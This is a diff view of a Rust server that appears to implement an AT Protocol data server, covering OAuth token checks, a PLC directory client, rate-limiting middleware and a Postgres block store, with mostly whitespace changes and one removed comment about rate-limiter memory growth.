··· 10 use sha2::Sha256; 11 use sqlx::PgPool; 12 use subtle::ConstantTimeEq; 13 + 14 use crate::config::AuthConfig; 15 use crate::state::AppState; 16 use super::db; 17 use super::dpop::DPoPVerifier; 18 use super::OAuthError; 19 + 20 pub struct OAuthTokenInfo { 21 pub did: String, 22 pub token_id: String, ··· 24 pub scope: Option<String>, 25 pub dpop_jkt: Option<String>, 26 } 27 + 28 pub struct VerifyResult { 29 pub did: String, 30 pub token_id: String, 31 pub client_id: String, 32 pub scope: Option<String>, 33 } 34 + 35 pub async fn verify_oauth_access_token( 36 pool: &PgPool, 37 access_token: &str, ··· 73 scope: token_data.scope, 74 }) 75 } 76 + 77 pub fn extract_oauth_token_info(token: &str) -> Result<OAuthTokenInfo, OAuthError> { 78 let parts: Vec<&str> = token.split('.').collect(); 79 if parts.len() != 3 { ··· 146 dpop_jkt, 147 }) 148 } 149 + 150 fn compute_ath(access_token: &str) -> String { 151 use sha2::Digest; 152 let mut hasher = Sha256::new(); ··· 154 let hash = hasher.finalize(); 155 URL_SAFE_NO_PAD.encode(&hash) 156 } 157 + 158 pub fn generate_dpop_nonce() -> String { 159 let config = AuthConfig::get(); 160 let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes()); 161 verifier.generate_nonce() 162 } 163 + 164 pub struct OAuthUser { 165 pub did: String, 166 pub client_id: Option<String>, 167 pub scope: Option<String>, 168 pub is_oauth: bool, 169 } 170 + 171 pub struct OAuthAuthError { 172 pub status: StatusCode, 173 pub error: String, 174 pub message: String, 175 pub dpop_nonce: Option<String>, 176 } 177 + 178 impl IntoResponse for OAuthAuthError { 179 fn into_response(self) -> Response { 180 let mut response = ( ··· 194 response 195 } 196 } 197 + 198 impl FromRequestParts<AppState> for OAuthUser { 199 type Rejection = OAuthAuthError; 200 + 201 async fn from_request_parts(parts: &mut Parts, state: &AppState) -> Result<Self, Self::Rejection> { 202 let auth_header = parts 203 .headers ··· 270 } 271 } 272 } 273 + 274 struct LegacyAuthResult { 275 did: String, 276 } 277 + 278 async fn try_legacy_auth(pool: &PgPool, token: &str) -> Result<LegacyAuthResult, ()> { 279 match crate::auth::validate_bearer_token(pool, token).await { 280 Ok(user) if !user.is_oauth => Ok(LegacyAuthResult { did: user.did }),
+30
src/plc/mod.rs
··· 8 use std::collections::HashMap; 9 use std::time::Duration; 10 use thiserror::Error; 11 #[derive(Error, Debug)] 12 pub enum PlcError { 13 #[error("HTTP request failed: {0}")] ··· 27 #[error("Service unavailable (circuit breaker open)")] 28 CircuitBreakerOpen, 29 } 30 #[derive(Debug, Clone, Serialize, Deserialize)] 31 pub struct PlcOperation { 32 #[serde(rename = "type")] ··· 42 #[serde(skip_serializing_if = "Option::is_none")] 43 pub sig: Option<String>, 44 } 45 #[derive(Debug, Clone, Serialize, Deserialize)] 46 pub struct PlcService { 47 #[serde(rename = "type")] 48 pub service_type: String, 49 pub endpoint: String, 50 } 51 #[derive(Debug, Clone, Serialize, Deserialize)] 52 pub struct PlcTombstone { 53 #[serde(rename = "type")] ··· 56 #[serde(skip_serializing_if = "Option::is_none")] 57 pub sig: Option<String>, 58 } 59 #[derive(Debug, Clone, Serialize, Deserialize)] 60 #[serde(untagged)] 61 pub enum PlcOpOrTombstone { 62 Operation(PlcOperation), 63 Tombstone(PlcTombstone), 64 } 65 impl PlcOpOrTombstone { 66 pub fn is_tombstone(&self) -> bool { 67 match self { ··· 70 } 71 } 72 } 73 pub struct PlcClient { 74 base_url: String, 75 client: Client, 76 } 77 impl PlcClient { 78 pub fn new(base_url: Option<String>) -> Self { 79 let base_url = base_url.unwrap_or_else(|| { ··· 99 client, 100 } 101 } 102 fn encode_did(did: &str) -> String { 103 urlencoding::encode(did).to_string() 104 } 105 pub async fn get_document(&self, did: &str) -> Result<Value, PlcError> { 106 let url = format!("{}/{}", self.base_url, Self::encode_did(did)); 107 let response = self.client.get(&url).send().await?; ··· 118 } 119 response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 120 } 121 pub async fn get_document_data(&self, did: &str) -> Result<Value, PlcError> { 122 let url = format!("{}/{}/data", self.base_url, Self::encode_did(did)); 123 let response = self.client.get(&url).send().await?; ··· 134 } 135 response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 136 } 137 pub async fn get_last_op(&self, did: &str) -> Result<PlcOpOrTombstone, PlcError> { 138 let url = format!("{}/{}/log/last", self.base_url, Self::encode_did(did)); 139 let response = self.client.get(&url).send().await?; ··· 150 } 151 response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 152 } 153 pub async fn get_audit_log(&self, did: &str) -> Result<Vec<Value>, PlcError> { 154 let url = format!("{}/{}/log/audit", self.base_url, Self::encode_did(did)); 155 let response = self.client.get(&url).send().await?; ··· 166 } 167 response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 168 } 169 pub async fn send_operation(&self, did: &str, operation: &Value) -> Result<(), PlcError> { 170 let url = format!("{}/{}", self.base_url, Self::encode_did(did)); 171 let response = self.client ··· 184 Ok(()) 185 } 186 } 187 pub fn cid_for_cbor(value: &Value) -> Result<String, PlcError> { 188 let cbor_bytes = serde_ipld_dagcbor::to_vec(value) 189 .map_err(|e| PlcError::Serialization(e.to_string()))?; ··· 195 let cid = cid::Cid::new_v1(0x71, multihash); 196 Ok(cid.to_string()) 197 } 198 pub fn sign_operation( 199 operation: &Value, 200 signing_key: &SigningKey, ··· 213 } 214 Ok(op) 215 } 216 pub fn create_update_op( 217 last_op: &PlcOpOrTombstone, 218 rotation_keys: Option<Vec<String>>, ··· 250 }; 251 serde_json::to_value(new_op).map_err(|e| PlcError::Serialization(e.to_string())) 252 } 253 pub fn signing_key_to_did_key(signing_key: &SigningKey) -> String { 254 let verifying_key = signing_key.verifying_key(); 255 let point = verifying_key.to_encoded_point(true); ··· 259 let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed); 260 format!("did:key:{}", encoded) 261 } 262 pub struct GenesisResult { 263 pub did: String, 264 pub signed_operation: Value, 265 } 266 pub fn create_genesis_operation( 267 signing_key: &SigningKey, 268 rotation_key: &str, ··· 298 signed_operation: signed_op, 299 }) 300 } 301 pub fn did_for_genesis_op(signed_op: &Value) -> Result<String, PlcError> { 302 let cbor_bytes = serde_ipld_dagcbor::to_vec(signed_op) 303 .map_err(|e| PlcError::Serialization(e.to_string()))?; ··· 308 let truncated = &encoded[..24]; 309 Ok(format!("did:plc:{}", truncated)) 310 } 311 pub fn validate_plc_operation(op: &Value) -> Result<(), PlcError> { 312 let obj = op.as_object() 313 .ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?; ··· 336 } 337 Ok(()) 338 } 339 pub struct PlcValidationContext { 340 pub server_rotation_key: String, 341 pub expected_signing_key: String, 342 pub expected_handle: String, 343 pub expected_pds_endpoint: String, 344 } 345 pub fn validate_plc_operation_for_submission( 346 op: &Value, 347 ctx: &PlcValidationContext, ··· 407 } 408 Ok(()) 409 } 410 pub fn verify_operation_signature( 411 op: &Value, 412 rotation_keys: &[String], ··· 434 } 435 Ok(false) 436 } 437 fn verify_signature_with_did_key( 438 did_key: &str, 439 message: &[u8], ··· 461 .map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?; 462 Ok(verifying_key.verify(message, signature).is_ok()) 463 } 464 #[cfg(test)] 465 mod tests { 466 use super::*; 467 #[test] 468 fn test_signing_key_to_did_key() { 469 let key = SigningKey::random(&mut rand::thread_rng()); 470 let did_key = signing_key_to_did_key(&key); 471 assert!(did_key.starts_with("did:key:z")); 472 } 473 #[test] 474 fn test_cid_for_cbor() { 475 let value = json!({ ··· 479 let cid = cid_for_cbor(&value).unwrap(); 480 assert!(cid.starts_with("bafyrei")); 481 } 482 #[test] 483 fn test_sign_operation() { 484 let key = SigningKey::random(&mut rand::thread_rng());
··· 8 use std::collections::HashMap; 9 use std::time::Duration; 10 use thiserror::Error; 11 + 12 #[derive(Error, Debug)] 13 pub enum PlcError { 14 #[error("HTTP request failed: {0}")] ··· 28 #[error("Service unavailable (circuit breaker open)")] 29 CircuitBreakerOpen, 30 } 31 + 32 #[derive(Debug, Clone, Serialize, Deserialize)] 33 pub struct PlcOperation { 34 #[serde(rename = "type")] ··· 44 #[serde(skip_serializing_if = "Option::is_none")] 45 pub sig: Option<String>, 46 } 47 + 48 #[derive(Debug, Clone, Serialize, Deserialize)] 49 pub struct PlcService { 50 #[serde(rename = "type")] 51 pub service_type: String, 52 pub endpoint: String, 53 } 54 + 55 #[derive(Debug, Clone, Serialize, Deserialize)] 56 pub struct PlcTombstone { 57 #[serde(rename = "type")] ··· 60 #[serde(skip_serializing_if = "Option::is_none")] 61 pub sig: Option<String>, 62 } 63 + 64 #[derive(Debug, Clone, Serialize, Deserialize)] 65 #[serde(untagged)] 66 pub enum PlcOpOrTombstone { 67 Operation(PlcOperation), 68 Tombstone(PlcTombstone), 69 } 70 + 71 impl PlcOpOrTombstone { 72 pub fn is_tombstone(&self) -> bool { 73 match self { ··· 76 } 77 } 78 } 79 + 80 pub struct PlcClient { 81 base_url: String, 82 client: Client, 83 } 84 + 85 impl PlcClient { 86 pub fn new(base_url: Option<String>) -> Self { 87 let base_url = base_url.unwrap_or_else(|| { ··· 107 client, 108 } 109 } 110 + 111 fn encode_did(did: &str) -> String { 112 urlencoding::encode(did).to_string() 113 } 114 + 115 pub async fn get_document(&self, did: &str) -> Result<Value, PlcError> { 116 let url = format!("{}/{}", self.base_url, Self::encode_did(did)); 117 let response = self.client.get(&url).send().await?; ··· 128 } 129 response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 130 } 131 + 132 pub async fn get_document_data(&self, did: &str) -> Result<Value, PlcError> { 133 let url = format!("{}/{}/data", self.base_url, Self::encode_did(did)); 134 let response = self.client.get(&url).send().await?; ··· 145 } 146 response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 147 } 148 + 149 pub async fn get_last_op(&self, did: &str) -> Result<PlcOpOrTombstone, PlcError> { 150 let url = format!("{}/{}/log/last", self.base_url, Self::encode_did(did)); 151 let response = self.client.get(&url).send().await?; ··· 162 } 163 response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 164 } 165 + 166 pub async fn get_audit_log(&self, did: &str) -> Result<Vec<Value>, PlcError> { 167 let url = format!("{}/{}/log/audit", self.base_url, Self::encode_did(did)); 168 let response = self.client.get(&url).send().await?; ··· 179 } 180 response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 181 } 182 + 183 pub async fn send_operation(&self, did: &str, operation: &Value) -> Result<(), PlcError> { 184 let url = format!("{}/{}", self.base_url, Self::encode_did(did)); 185 let response = self.client ··· 198 Ok(()) 199 } 200 } 201 + 202 pub fn cid_for_cbor(value: &Value) -> Result<String, PlcError> { 203 let cbor_bytes = serde_ipld_dagcbor::to_vec(value) 204 .map_err(|e| PlcError::Serialization(e.to_string()))?; ··· 210 let cid = cid::Cid::new_v1(0x71, multihash); 211 Ok(cid.to_string()) 212 } 213 + 214 pub fn sign_operation( 215 operation: &Value, 216 signing_key: &SigningKey, ··· 229 } 230 Ok(op) 231 } 232 + 233 pub fn create_update_op( 234 last_op: &PlcOpOrTombstone, 235 rotation_keys: Option<Vec<String>>, ··· 267 }; 268 serde_json::to_value(new_op).map_err(|e| PlcError::Serialization(e.to_string())) 269 } 270 + 271 pub fn signing_key_to_did_key(signing_key: &SigningKey) -> String { 272 let verifying_key = signing_key.verifying_key(); 273 let point = verifying_key.to_encoded_point(true); ··· 277 let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed); 278 format!("did:key:{}", encoded) 279 } 280 + 281 pub struct GenesisResult { 282 pub did: String, 283 pub signed_operation: Value, 284 } 285 + 286 pub fn create_genesis_operation( 287 signing_key: &SigningKey, 288 rotation_key: &str, ··· 318 signed_operation: signed_op, 319 }) 320 } 321 + 322 pub fn did_for_genesis_op(signed_op: &Value) -> Result<String, PlcError> { 323 let cbor_bytes = serde_ipld_dagcbor::to_vec(signed_op) 324 .map_err(|e| PlcError::Serialization(e.to_string()))?; ··· 329 let truncated = &encoded[..24]; 330 Ok(format!("did:plc:{}", truncated)) 331 } 332 + 333 pub fn validate_plc_operation(op: &Value) -> Result<(), PlcError> { 334 let obj = op.as_object() 335 .ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?; ··· 358 } 359 Ok(()) 360 } 361 + 362 pub struct PlcValidationContext { 363 pub server_rotation_key: String, 364 pub expected_signing_key: String, 365 pub expected_handle: String, 366 pub expected_pds_endpoint: String, 367 } 368 + 369 pub fn validate_plc_operation_for_submission( 370 op: &Value, 371 ctx: &PlcValidationContext, ··· 431 } 432 Ok(()) 433 } 434 + 435 pub fn verify_operation_signature( 436 op: &Value, 437 rotation_keys: &[String], ··· 459 } 460 Ok(false) 461 } 462 + 463 fn verify_signature_with_did_key( 464 did_key: &str, 465 message: &[u8], ··· 487 .map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?; 488 Ok(verifying_key.verify(message, signature).is_ok()) 489 } 490 + 491 #[cfg(test)] 492 mod tests { 493 use super::*; 494 + 495 #[test] 496 fn test_signing_key_to_did_key() { 497 let key = SigningKey::random(&mut rand::thread_rng()); 498 let did_key = signing_key_to_did_key(&key); 499 assert!(did_key.starts_with("did:key:z")); 500 } 501 + 502 #[test] 503 fn test_cid_for_cbor() { 504 let value = json!({ ··· 508 let cid = cid_for_cbor(&value).unwrap(); 509 assert!(cid.starts_with("bafyrei")); 510 } 511 + 512 #[test] 513 fn test_sign_operation() { 514 let key = SigningKey::random(&mut rand::thread_rng());
+34 -5
src/rate_limit.rs
··· 16 num::NonZeroU32, 17 sync::Arc, 18 }; 19 pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>; 20 pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>; 21 - // NOTE: For production deployments with high traffic, prefer using the distributed rate 22 - // limiter (Redis/Valkey-based) via AppState::distributed_rate_limiter. The in-memory 23 - // rate limiters here don't automatically clean up expired entries, which can cause 24 - // memory growth over time with many unique client IPs. The distributed rate limiter 25 - // uses Redis TTL for automatic cleanup and works correctly across multiple instances. 26 #[derive(Clone)] 27 pub struct RateLimiters { 28 pub login: Arc<KeyedRateLimiter>, ··· 37 pub app_password: Arc<KeyedRateLimiter>, 38 pub email_update: Arc<KeyedRateLimiter>, 39 } 40 impl Default for RateLimiters { 41 fn default() -> Self { 42 Self::new() 43 } 44 } 45 impl RateLimiters { 46 pub fn new() -> Self { 47 Self { ··· 80 )), 81 } 82 } 83 pub fn with_login_limit(mut self, per_minute: u32) -> Self { 84 self.login = Arc::new(RateLimiter::keyed( 85 Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap())) 86 )); 87 self 88 } 89 pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self { 90 self.oauth_token = Arc::new(RateLimiter::keyed( 91 Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap())) 92 )); 93 self 94 } 95 pub fn with_oauth_authorize_limit(mut self, per_minute: u32) -> Self { 96 self.oauth_authorize = Arc::new(RateLimiter::keyed( 97 Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap())) 98 )); 99 self 100 } 101 pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self { 102 self.password_reset = Arc::new(RateLimiter::keyed( 103 Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap())) 104 )); 105 self 106 } 107 pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self { 108 self.account_creation = Arc::new(RateLimiter::keyed( 109 Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap())) 110 )); 111 self 112 } 113 pub fn with_email_update_limit(mut self, per_hour: u32) -> Self { 114 self.email_update = Arc::new(RateLimiter::keyed( 115 Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap())) ··· 117 self 118 } 119 } 120 pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String { 121 if let Some(forwarded) = headers.get("x-forwarded-for") { 122 if let Ok(value) = forwarded.to_str() { ··· 125 } 126 } 127 } 128 if let Some(real_ip) = headers.get("x-real-ip") { 129 if let Ok(value) = real_ip.to_str() { 130 return value.trim().to_string(); 131 } 132 } 133 addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string()) 134 } 135 fn rate_limit_response() -> Response { 136 ( 137 StatusCode::TOO_MANY_REQUESTS, ··· 142 ) 143 .into_response() 144 } 145 pub async fn login_rate_limit( 146 ConnectInfo(addr): ConnectInfo<SocketAddr>, 147 axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, ··· 149 next: Next, 150 ) -> Response { 151 let client_ip = extract_client_ip(request.headers(), Some(addr)); 152 if limiters.login.check_key(&client_ip).is_err() { 153 tracing::warn!(ip = %client_ip, "Login rate limit exceeded"); 154 return rate_limit_response(); 155 } 156 next.run(request).await 157 } 158 pub async fn oauth_token_rate_limit( 159 ConnectInfo(addr): ConnectInfo<SocketAddr>, 160 axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, ··· 162 next: Next, 163 ) -> Response { 164 let client_ip = extract_client_ip(request.headers(), Some(addr)); 165 if limiters.oauth_token.check_key(&client_ip).is_err() { 166 tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded"); 167 return rate_limit_response(); 168 } 169 next.run(request).await 170 } 171 pub async fn password_reset_rate_limit( 172 ConnectInfo(addr): ConnectInfo<SocketAddr>, 173 axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, ··· 175 next: Next, 176 ) -> Response { 177 let client_ip = extract_client_ip(request.headers(), Some(addr)); 178 if limiters.password_reset.check_key(&client_ip).is_err() { 179 tracing::warn!(ip = %client_ip, "Password reset rate limit exceeded"); 180 return rate_limit_response(); 181 } 182 next.run(request).await 183 } 184 pub async fn account_creation_rate_limit( 185 ConnectInfo(addr): ConnectInfo<SocketAddr>, 186 axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, ··· 188 next: Next, 189 ) -> Response { 190 let client_ip = extract_client_ip(request.headers(), Some(addr)); 191 if limiters.account_creation.check_key(&client_ip).is_err() { 192 tracing::warn!(ip = %client_ip, "Account creation rate limit exceeded"); 193 return rate_limit_response(); 194 } 195 next.run(request).await 196 } 197 #[cfg(test)] 198 mod tests { 199 use super::*; 200 #[test] 201 fn test_rate_limiters_creation() { 202 let limiters = RateLimiters::new(); 203 assert!(limiters.login.check_key(&"test".to_string()).is_ok()); 204 } 205 #[test] 206 fn test_rate_limiter_exhaustion() { 207 let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(2).unwrap())); 208 let key = "test_ip".to_string(); 209 assert!(limiter.check_key(&key).is_ok()); 210 assert!(limiter.check_key(&key).is_ok()); 211 assert!(limiter.check_key(&key).is_err()); 212 } 213 #[test] 214 fn test_different_keys_have_separate_limits() { 215 let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(1).unwrap())); 216 assert!(limiter.check_key(&"ip1".to_string()).is_ok()); 217 assert!(limiter.check_key(&"ip1".to_string()).is_err()); 218 assert!(limiter.check_key(&"ip2".to_string()).is_ok()); 219 } 220 #[test] 221 fn test_builder_pattern() { 222 let limiters = RateLimiters::new() ··· 224 .with_oauth_token_limit(60) 225 .with_password_reset_limit(3) 226 .with_account_creation_limit(5); 227 assert!(limiters.login.check_key(&"test".to_string()).is_ok()); 228 } 229 }
··· 16 num::NonZeroU32, 17 sync::Arc, 18 }; 19 + 20 pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>; 21 pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>; 22 + 23 #[derive(Clone)] 24 pub struct RateLimiters { 25 pub login: Arc<KeyedRateLimiter>, ··· 34 pub app_password: Arc<KeyedRateLimiter>, 35 pub email_update: Arc<KeyedRateLimiter>, 36 } 37 + 38 impl Default for RateLimiters { 39 fn default() -> Self { 40 Self::new() 41 } 42 } 43 + 44 impl RateLimiters { 45 pub fn new() -> Self { 46 Self { ··· 79 )), 80 } 81 } 82 + 83 pub fn with_login_limit(mut self, per_minute: u32) -> Self { 84 self.login = Arc::new(RateLimiter::keyed( 85 Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap())) 86 )); 87 self 88 } 89 + 90 pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self { 91 self.oauth_token = Arc::new(RateLimiter::keyed( 92 Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap())) 93 )); 94 self 95 } 96 + 97 pub fn with_oauth_authorize_limit(mut self, per_minute: u32) -> Self { 98 self.oauth_authorize = Arc::new(RateLimiter::keyed( 99 Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap())) 100 )); 101 self 102 } 103 + 104 pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self { 105 self.password_reset = Arc::new(RateLimiter::keyed( 106 Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap())) 107 )); 108 self 109 } 110 + 111 pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self { 112 self.account_creation = Arc::new(RateLimiter::keyed( 113 Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap())) 114 )); 115 self 116 } 117 + 118 pub fn with_email_update_limit(mut self, per_hour: u32) -> Self { 119 self.email_update = Arc::new(RateLimiter::keyed( 120 Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap())) ··· 122 self 123 } 124 } 125 + 126 pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String { 127 if let Some(forwarded) = headers.get("x-forwarded-for") { 128 if let Ok(value) = forwarded.to_str() { ··· 131 } 132 } 133 } 134 + 135 if let Some(real_ip) = headers.get("x-real-ip") { 136 if let Ok(value) = real_ip.to_str() { 137 return value.trim().to_string(); 138 } 139 } 140 + 141 addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string()) 142 } 143 + 144 fn rate_limit_response() -> Response { 145 ( 146 StatusCode::TOO_MANY_REQUESTS, ··· 151 ) 152 .into_response() 153 } 154 + 155 pub async fn login_rate_limit( 156 ConnectInfo(addr): ConnectInfo<SocketAddr>, 157 axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, ··· 159 next: Next, 160 ) -> Response { 161 let client_ip = extract_client_ip(request.headers(), Some(addr)); 162 + 163 if limiters.login.check_key(&client_ip).is_err() { 164 tracing::warn!(ip = %client_ip, "Login rate limit exceeded"); 165 return rate_limit_response(); 166 } 167 + 168 next.run(request).await 169 } 170 + 171 pub async fn oauth_token_rate_limit( 172 ConnectInfo(addr): ConnectInfo<SocketAddr>, 173 axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, ··· 175 next: Next, 176 ) -> Response { 177 let client_ip = extract_client_ip(request.headers(), Some(addr)); 178 + 179 if limiters.oauth_token.check_key(&client_ip).is_err() { 180 tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded"); 181 return rate_limit_response(); 182 } 183 + 184 next.run(request).await 185 } 186 + 187 pub async fn password_reset_rate_limit( 188 ConnectInfo(addr): ConnectInfo<SocketAddr>, 189 axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, ··· 191 next: Next, 192 ) -> Response { 193 let client_ip = extract_client_ip(request.headers(), Some(addr)); 194 + 195 if limiters.password_reset.check_key(&client_ip).is_err() { 196 tracing::warn!(ip = %client_ip, "Password reset rate limit exceeded"); 197 return rate_limit_response(); 198 } 199 + 200 next.run(request).await 201 } 202 + 203 pub async fn account_creation_rate_limit( 204 ConnectInfo(addr): ConnectInfo<SocketAddr>, 205 axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, ··· 207 next: Next, 208 ) -> Response { 209 let client_ip = extract_client_ip(request.headers(), Some(addr)); 210 + 211 if limiters.account_creation.check_key(&client_ip).is_err() { 212 tracing::warn!(ip = %client_ip, "Account creation rate limit exceeded"); 213 return rate_limit_response(); 214 } 215 + 216 next.run(request).await 217 } 218 + 219 #[cfg(test)] 220 mod tests { 221 use super::*; 222 + 223 #[test] 224 fn test_rate_limiters_creation() { 225 let limiters = RateLimiters::new(); 226 assert!(limiters.login.check_key(&"test".to_string()).is_ok()); 227 } 228 + 229 #[test] 230 fn test_rate_limiter_exhaustion() { 231 let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(2).unwrap())); 232 let key = "test_ip".to_string(); 233 + 234 assert!(limiter.check_key(&key).is_ok()); 235 assert!(limiter.check_key(&key).is_ok()); 236 assert!(limiter.check_key(&key).is_err()); 237 } 238 + 239 #[test] 240 fn test_different_keys_have_separate_limits() { 241 let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(1).unwrap())); 242 + 243 assert!(limiter.check_key(&"ip1".to_string()).is_ok()); 244 assert!(limiter.check_key(&"ip1".to_string()).is_err()); 245 assert!(limiter.check_key(&"ip2".to_string()).is_ok()); 246 } 247 + 248 #[test] 249 fn test_builder_pattern() { 250 let limiters = RateLimiters::new() ··· 252 .with_oauth_token_limit(60) 253 .with_password_reset_limit(3) 254 .with_account_creation_limit(5); 255 + 256 assert!(limiters.login.check_key(&"test".to_string()).is_ok()); 257 } 258 }
+9
src/repo/mod.rs
··· 6 use multihash::Multihash; 7 use sha2::{Digest, Sha256}; 8 use sqlx::PgPool; 9 pub mod tracking; 10 #[derive(Clone)] 11 pub struct PostgresBlockStore { 12 pool: PgPool, 13 } 14 impl PostgresBlockStore { 15 pub fn new(pool: PgPool) -> Self { 16 Self { pool } 17 } 18 } 19 impl BlockStore for PostgresBlockStore { 20 async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> { 21 crate::metrics::record_block_operation("get"); ··· 29 None => Ok(None), 30 } 31 } 32 async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> { 33 crate::metrics::record_block_operation("put"); 34 let mut hasher = Sha256::new(); ··· 44 .map_err(|e| RepoError::storage(e))?; 45 Ok(cid) 46 } 47 async fn has(&self, cid: &Cid) -> Result<bool, RepoError> { 48 crate::metrics::record_block_operation("has"); 49 let cid_bytes = cid.to_bytes(); ··· 53 .map_err(|e| RepoError::storage(e))?; 54 Ok(row.is_some()) 55 } 56 async fn put_many( 57 &self, 58 blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send, ··· 78 .map_err(|e| RepoError::storage(e))?; 79 Ok(()) 80 } 81 async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> { 82 if cids.is_empty() { 83 return Ok(Vec::new()); ··· 101 .collect(); 102 Ok(results) 103 } 104 async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> { 105 self.put_many(commit.blocks).await?; 106 Ok(())
··· 6 use multihash::Multihash; 7 use sha2::{Digest, Sha256}; 8 use sqlx::PgPool; 9 + 10 pub mod tracking; 11 + 12 #[derive(Clone)] 13 pub struct PostgresBlockStore { 14 pool: PgPool, 15 } 16 + 17 impl PostgresBlockStore { 18 pub fn new(pool: PgPool) -> Self { 19 Self { pool } 20 } 21 } 22 + 23 impl BlockStore for PostgresBlockStore { 24 async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> { 25 crate::metrics::record_block_operation("get"); ··· 33 None => Ok(None), 34 } 35 } 36 + 37 async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> { 38 crate::metrics::record_block_operation("put"); 39 let mut hasher = Sha256::new(); ··· 49 .map_err(|e| RepoError::storage(e))?; 50 Ok(cid) 51 } 52 + 53 async fn has(&self, cid: &Cid) -> Result<bool, RepoError> { 54 crate::metrics::record_block_operation("has"); 55 let cid_bytes = cid.to_bytes(); ··· 59 .map_err(|e| RepoError::storage(e))?; 60 Ok(row.is_some()) 61 } 62 + 63 async fn put_many( 64 &self, 65 blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send, ··· 85 .map_err(|e| RepoError::storage(e))?; 86 Ok(()) 87 } 88 + 89 async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> { 90 if cids.is_empty() { 91 return Ok(Vec::new()); ··· 109 .collect(); 110 Ok(results) 111 } 112 + 113 async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> { 114 self.put_many(commit.blocks).await?; 115 Ok(())
+11
src/repo/tracking.rs
··· 6 use jacquard_repo::storage::BlockStore; 7 use std::collections::HashSet; 8 use std::sync::{Arc, Mutex}; 9 #[derive(Clone)] 10 pub struct TrackingBlockStore { 11 inner: PostgresBlockStore, 12 written_cids: Arc<Mutex<Vec<Cid>>>, 13 read_cids: Arc<Mutex<HashSet<Cid>>>, 14 } 15 impl TrackingBlockStore { 16 pub fn new(store: PostgresBlockStore) -> Self { 17 Self { ··· 20 read_cids: Arc::new(Mutex::new(HashSet::new())), 21 } 22 } 23 pub fn get_written_cids(&self) -> Vec<Cid> { 24 match self.written_cids.lock() { 25 Ok(guard) => guard.clone(), 26 Err(poisoned) => poisoned.into_inner().clone(), 27 } 28 } 29 pub fn get_read_cids(&self) -> Vec<Cid> { 30 match self.read_cids.lock() { 31 Ok(guard) => guard.iter().cloned().collect(), 32 Err(poisoned) => poisoned.into_inner().iter().cloned().collect(), 33 } 34 } 35 pub fn get_all_relevant_cids(&self) -> Vec<Cid> { 36 let written = self.get_written_cids(); 37 let read = self.get_read_cids(); 